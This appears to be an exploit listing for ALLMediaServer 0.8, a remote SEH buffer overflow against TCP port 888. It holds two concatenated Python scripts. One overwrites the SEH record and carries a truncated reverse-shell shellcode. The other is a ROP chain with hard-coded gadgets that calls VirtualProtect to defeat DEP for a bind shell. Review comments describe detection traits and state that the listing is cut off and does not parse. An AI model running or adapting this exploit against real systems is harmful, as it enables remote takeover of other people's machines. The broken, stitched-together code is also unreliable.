ALLMediaServer 0.8 – Remote Overflow (SEH)

  • 作者: motaz reda
    日期: 2012-07-06
  • # Exploit Title: seh exploit, BOF 
    # Date: 04/07/2012
    # Exploit Author: motaz reda 
    # my
    # Software Link:
    # Version: ALLMediaServer 0.8
    # Tested On: Windows 7 ultimate
    import sys, socket
    # NOTE(review): this is a rendered listing, not a runnable file. Two scripts are
    # concatenated here: the author's original SEH-overwrite version (up to the
    # shellcode string that is cut off below) and an Exploit-DB ROP variant that
    # follows it. Both parenthesised shellcode literals are never closed in this
    # listing, so the text as shown does not parse.
    # Target host is taken from argv[1]; the service is reached on TCP port 888.
    # Observable characteristics for detection: a single request of a fixed
    # 1765 bytes (see the length padding at the bottom), consisting mostly of
    # 0x41 filler and 0xCC padding, sent to port 888.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 888))
    # --- Original version (SEH overwrite) ---
    # 1072 bytes of filler precede the overwritten exception-handler record.
    buffer = "A" * 1072
    buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6
    # SEH record pointer to a pop/pop/retn sequence; a SafeSEH-registered handler
    # table would presumably refuse this address - TODO confirm for this binary.
    buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN
    # msfpayload windows/shell_reverse_tcp 
    # you can replace the shellcode with any shellcode u want
    # The literal below is truncated in this listing (opening parenthesis never closed).
    buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
    ### Exploit-DB note:
    ### This affects AllMediaSErver 0.94 as well.
    # Exploit-DB Note:
    # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
    # DEP/ASLR bypass with bind shell on port 4444
    # --- Exploit-DB variant (ROP chain) ---
    # NOTE(review): every gadget address below is hard-coded; per the author's
    # annotations they live in MediaServer.exe, avcodec-53.dll and avformat-53.dll.
    # The chain only works if those modules load at fixed addresses (the note above
    # claims an ASLR bypass), i.e. presumably they are not ASLR-rebased - TODO confirm.
    # Building/shipping those modules with ASLR enabled would invalidate a chain of
    # this kind; the 0.8 and 0.94 builds named in this listing are the affected ones.
    # Note that `buffer` is reassigned here, discarding the first version's content.
    buffer = "\x41" * 984
    buffer+= "\xe6\x30\x46\x00"	# Second ADD esp for stack adjustment
    				# add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
    buffer+= "\x41" * 88
    # Step over SEH
    stackAdjust = "\x9e\x6c\x42\x00"	# add esp,800 | pop ebx | retn ~ MediaServer.exe
    					# Returns to Second ADD ESP
    stackAdjust+= "\x42\x42\x42\x42" * 15	# Padding
    # VirtualProtect into ESI
    # The chain stages VirtualProtect's arguments in registers (ESI, EBP, EBX,
    # EDX, ECX, EDI, EAX) and then relies on PUSHAD to lay them out as a call frame.
    rop = "\x26\xfa\xf6\x65"	# pop eax | retn	 		~ avcodec-53.dll
    rop+= "\xe0\xe4\x1e\x67"	# &kernel32.VirtualProtect		~
    rop+= "\x54\xcd\xc6\x6a"	# mov eax,dword ptr ds:[eax] | retn	~
    rop+= "\x04\xef\x2e\x66"	# xchg eax,esi | retn			~ avcodec-53.dll
    				# Puts kernel32.VirtualProtect (resolved via the pointer above) in ESI
    # lpAddress param into EBP
    rop+= "\xb3\x14\xb8\x68"# pop ebp | retn 	~
    rop+= "\x07\x5d\x0c\x66"	# ROP jmp esp | ???			~ avcodec-53.dll
    # dwSize into EBX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll
    rop+= "\xff\xfd\xff\xff"	# Will negate to 0x201 (avoids NUL bytes in the chain)
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn
    rop+= "\x2b\xe2\xf4\x65"	# xchg eax,ebx | retn			~ avcodec-53.dll
    # flNewProtect 0x40 into EDX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\xc0\xff\xff\xff"	# Will negate to 0x40 (PAGE_EXECUTE_READWRITE)
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll
    rop+= "\x46\x08\x53\x66"	# xchg eax,edx | retn			~ avcodec-53.dll
    # lpflOldProtect into ECX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x69\xef\x5f\x00"	# writeable address			~ avformat-53.dll
    rop+= "\xeb\x9b\x74\x66"	# xchg eax,ecx | retn			~ avcodec-53.dll
    # RETN into EDI
    rop+= "\x84\xe6\x75\x66"	# pop edi | retn
    rop+= "\x6d\x9b\xb2\x6a"	# retn ROP
    # Nops in EAX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x90\x90\x90\x90"
    # PushAD
    rop+= "\x3a\x18\x75\x66"	# pushad | retn				~ avcodec-53.dll
    rop+= "\x90\x90\x90\x90"
    # The shellcode literal is cut off in this listing (parenthesis never closed),
    # so nothing below this point is reachable from the text as shown.
    shellcode =(
    payload = buffer + stackAdjust + rop + shellcode
    # Total request length is pinned to 1765 bytes; the remainder is 0xCC (int3) padding.
    rest = 1765 - len(payload)
    exploit = payload + "\xCC" * rest
    # Send exploit to target's port 888
    # NOTE(review): the send call announced by the comment above is not part of
    # this listing; the text ends here.